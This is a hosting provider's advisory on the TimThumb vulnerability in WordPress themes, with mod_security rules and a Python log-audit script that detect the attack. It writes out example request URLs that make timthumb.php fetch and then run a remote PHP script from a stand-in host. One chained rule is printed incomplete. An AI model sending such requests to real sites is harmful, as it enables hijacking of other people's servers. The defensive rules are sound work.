Some WordPress themes (and other software) vulnerable to “TimThumb” bug

A popular piece of software called “TimThumb” (aka “timthumb.php”) was recently found to have a security bug that allows “hackers” to take over Web sites that use it (more info here).

Some popular custom WordPress themes include TimThumb as part of their features, making those themes vulnerable to this problem. (Just so it’s clear, TimThumb isn’t specific to WordPress, but that’s probably where it’s most commonly used.)

If you use WordPress and your Dashboard tells you to update your theme, you should do so right away (in fact, you should always update an outdated theme or plugin right away).

However, we’ve also added security rules to our servers to protect our Web hosting customers who haven’t yet upgraded. Other people may find the rules useful if they use mod_security on Apache Web servers. The rest of this post contains more technical details.

The mod_security rules

To block this attack, we’ve added two mod_security rules that block URLs that look like either of these:

  http://example.com/wp-content/themes/themename/timthumb.php?src=http://example.org/file.php
  http://example.com/wp-content/themes/themename/cache/1234567890abcdef.php

The first URL is what “hackers” use to make timthumb.php fetch a malicious PHP script from a site they control (the bug is in TimThumb’s check of which external hosts it will fetch images from); the fetched file ends up in the theme’s cache directory with a .php name, and the second URL is what they use to run that script on your site. Blocking either one should stop the attack, but blocking both is better, since each rule covers a failure of the other. These two lines block the first type of URL:

SecRule SCRIPT_BASENAME "^(tim)?thumb\.php$" "deny,status:412,auditlog,chain"

And this line blocks the second:

SecRule REQUEST_FILENAME "/wp-content/themes/.+/cache/[a-f0-9]+\.php[345]?$" "deny,status:412,auditlog"
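To see what the two patterns above actually match, here is an added Python example (not part of the original post, and not mod_security itself) that applies the same regular expressions to the request path and the `src` argument of a handful of constructed Apache access-log lines. The first rule carries `chain`, and its chained condition is not shown on this page, so the example assumes the chained check is “the src argument starts with http:// or https://”; that assumption, the `evaluate`/`audit` function names and the sample log lines are all mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pattern from the page's first rule (mod_security SCRIPT_BASENAME).
SCRIPT_BASENAME_RE = re.compile(r"^(tim)?thumb\.php$")
# ASSUMPTION: the chained second line of rule 1 is not shown on the page;
# here it is taken to be "the src argument is a remote URL".
REMOTE_SRC_RE = re.compile(r"^https?://", re.IGNORECASE)
# Pattern from the page's second rule (mod_security REQUEST_FILENAME).
CACHE_PHP_RE = re.compile(r"/wp-content/themes/.+/cache/[a-f0-9]+\.php[345]?$")

# Constructed sample log lines (Apache combined-log style); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Aug/2011:10:01:02 +0000] "GET /wp-content/themes/themename/timthumb.php?src=http://blogger.com.example.org/file.php HTTP/1.1" 200 1234
203.0.113.5 - - [11/Aug/2011:10:01:03 +0000] "GET /wp-content/themes/themename/cache/1234567890abcdef.php HTTP/1.1" 200 567
198.51.100.7 - - [11/Aug/2011:10:02:00 +0000] "GET /wp-content/themes/themename/timthumb.php?src=/wp-content/uploads/photo.jpg&w=100 HTTP/1.1" 200 8901
198.51.100.7 - - [11/Aug/2011:10:02:01 +0000] "GET /wp-content/themes/themename/cache/1234567890abcdef.jpg HTTP/1.1" 200 8901
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def evaluate(request_target: str) -> str:
    """Classify one request target ('/path?query') the way the two rules would.

    Returns 'rule1-remote-src', 'rule2-cache-php', or 'allow'.
    """
    parts = urlsplit(request_target)
    path = parts.path                      # REQUEST_FILENAME: path without the query string
    basename = path.rsplit("/", 1)[-1]     # SCRIPT_BASENAME: last path segment
    args = parse_qs(parts.query, keep_blank_values=True)

    # Rule 1: script is (tim)thumb.php AND (assumed chained condition) src is remote.
    if SCRIPT_BASENAME_RE.match(basename):
        for src in args.get("src", []):
            if REMOTE_SRC_RE.match(src):
                return "rule1-remote-src"

    # Rule 2: a .php/.php3/.php4/.php5 file with a hex name under a theme's cache/ dir.
    if CACHE_PHP_RE.search(path):
        return "rule2-cache-php"

    return "allow"


def audit(log_text: str) -> list[tuple[str, str]]:
    """Run evaluate() over every request in an access log; returns (target, verdict) pairs."""
    results = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue                        # not a request line we understand; skip it
        target = m.group(1)
        results.append((target, evaluate(target)))
    return results


if __name__ == "__main__":
    for target, verdict in audit(SAMPLE_LOG):
        print(f"{verdict:18s} {target}")
```

The two attacker requests from the log are denied by rule 1 and rule 2 respectively, while the ordinary thumbnail request (a local `src` path) and the non-PHP cache file pass. Note that rule 2 also catches `.php3`/`.php4`/`.php5` names, and that the basename match in rule 1 does not depend on the theme directory, so it applies wherever a theme or plugin ships the script.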

Again, we’ve already applied these rules to our servers, so our Web hosting customers are protected. But if you run a server for other people (especially one that hosts WordPress blogs), you should consider adding these mod_security rules to protect your users, too.

Update August 11: The first rule has been changed to block scripts named both “timthumb.php” and “thumb.php”, based on a suggestion from “bogdan”. Thanks!